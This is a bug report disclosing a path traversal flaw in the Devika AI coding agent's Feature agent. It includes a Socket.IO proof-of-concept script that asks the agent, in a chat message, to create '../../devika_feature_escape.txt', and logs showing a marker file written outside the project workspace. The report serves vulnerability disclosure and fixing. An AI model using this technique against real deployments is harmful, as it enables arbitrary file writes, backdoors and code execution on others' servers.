[Bug] Feature Agent path traversal vulnerability

[Ro1ME]

Describe the bug

CRITICAL SECURITY VULNERABILITY: The Feature Agent's save_code_to_project function contains a path traversal vulnerability that allows attackers to write files outside the intended project workspace, potentially compromising the entire server.

Vulnerability Type: CWE-22 Path Traversal
CVSS Score: 8.8 (High)
Affected File: src/agents/feature/feature.py:71
Affected Function: Feature.save_code_to_project
Entry Point: Socket.IO user-message event (action=feature)

Root Cause: The function constructs file paths using user-controlled input without proper boundary validation:

# Line 71 - VULNERABLE CODE
file_path = os.path.join(project_path, file_name)  # No path validation
with open(file_path, 'w') as f:
    f.write(code)

Security Impact:

• Arbitrary File Write: Write files anywhere on the server filesystem
• Code Execution: Overwrite Python modules or system files
• Data Exfiltration: Write sensitive data to web-accessible directories
• Persistence: Plant backdoors in startup scripts

How To Reproduce

Steps to reproduce the behavior (example):

Prerequisites

1. Start Devika server:

   cd devika
   python3 -m venv venv
   source venv/bin/activate  # On Windows: venv\Scripts\activate
   pip install -r requirements.txt
   python app.py

2. Access web UI at http://localhost:1337

3. Create a new project via the UI

Steps to reproduce the behavior

1. Connect to Socket.IO endpoint:

   import socketio
   
   sio = socketio.Client()
   sio.connect('http://localhost:1337')

2. Create baseline project file:

   # First message: create a normal file
   sio.emit('user-message', {
       'message': 'Add a new feature: create bootstrap.py',
       'project_name': 'cbdscan-feature-demo'
   })
   
   # Wait for completion...

3. Trigger Feature agent with path traversal:

   # Second message: path traversal attack
   sio.emit('user-message', {
       'message': 'Add feature: create file ../../devika_feature_escape.txt',
       'project_name': 'cbdscan-feature-demo'
   })

4. Verify file escaped project workspace:

   # Check that file exists outside project directory
   ls data/devika_feature_escape.txt
   cat data/devika_feature_escape.txt
   # Output: DEVIKA_FEATURE_LIVE_POC

Expected behavior

• File paths should be validated and normalized before writing
• Paths containing .. should be rejected or sanitized
• All file operations should be confined to the project workspace
• Absolute paths should be rejected

Screenshots and logs

Backend Logs:

[2026-04-10 04:13:56] Agent: Feature
[2026-04-10 04:13:56] State: completed
[2026-04-10 04:13:56] Terminal: vim bootstrap.py
[2026-04-10 04:13:56] Output: print('bootstrap')

[2026-04-10 04:13:59] Agent: Feature
[2026-04-10 04:13:59] State: completed
[2026-04-10 04:13:59] Terminal: vim ../../devika_feature_escape.txt
[2026-04-10 04:13:59] Output: DEVIKA_FEATURE_LIVE_POC
[2026-04-10 04:13:59] WARNING: File written outside project workspace!

Validation Evidence:

{
  "mode": "feature",
  "project_name": "cbdscan-feature-demo",
  "project_root": "data/projects/cbdscan-feature-demo",
  "baseline_project_file": "data/projects/cbdscan-feature-demo/bootstrap.py",
  "baseline_project_file_exists": true,
  "escape_target": "data/devika_feature_escape.txt",
  "escape_target_exists": true,
  "escape_target_within_project_root": false,
  "escape_target_content": "DEVIKA_FEATURE_LIVE_POC"
}

File System Evidence:

data/
├── projects/
│   └── cbdscan-feature-demo/
│       └── bootstrap.py              ✓ Expected location
└── devika_feature_escape.txt         ❌ ESCAPED PROJECT WORKSPACE

Configuration

- OS: Windows
- Python version: 3.10
- Node version: 8.0.0
- bun version:  0.1.0
- search engine: google
- Model: gpt-4

Additional context

Validation Status: CONFIRMED with real Socket.IO entry point

Attack Execution Flow:

User Message (Socket.IO)
    ↓
Agent.subsequent_execute(action=feature)
    ↓
Feature.execute()
    ↓
Feature.save_code_to_project(code, "../../escape.txt")
    ↓
File written outside workspace